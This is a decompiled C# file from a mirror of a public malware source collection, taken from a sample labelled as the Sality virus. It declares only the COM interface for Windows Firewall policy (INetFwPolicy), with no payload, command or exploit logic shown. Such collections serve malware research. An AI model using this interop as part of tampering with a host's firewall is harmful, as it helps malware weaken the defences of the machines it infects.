mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
21 lines
763 B
C#
21 lines
763 B
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: INetFwPolicy
|
|||
|
// Assembly: PMSInstallInit, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 1143B458-69F7-4F72-9059-A13F9AB730BC
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.Win32.Sality.sil-66a8bf80b7d1c03c218a77899ddc10c75b21c3784127eb96343f22ad5b31b4d6.exe
|
|||
|
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
[TypeLibType(4160)]
|
|||
|
[Guid("D46D2478-9AC9-4008-9DC7-5563CE5536CC")]
|
|||
|
[ComImport]
|
|||
|
public interface INetFwPolicy
|
|||
|
{
|
|||
|
[DispId(1)]
|
|||
|
INetFwProfile CurrentProfile { [DispId(1)] [return: MarshalAs(UnmanagedType.Interface)] get; }
|
|||
|
|
|||
|
[DispId(2)]
|
|||
|
[return: MarshalAs(UnmanagedType.Interface)]
|
|||
|
INetFwProfile GetProfileByType([In] NET_FW_PROFILE_TYPE_ profileType);
|
|||
|
}
|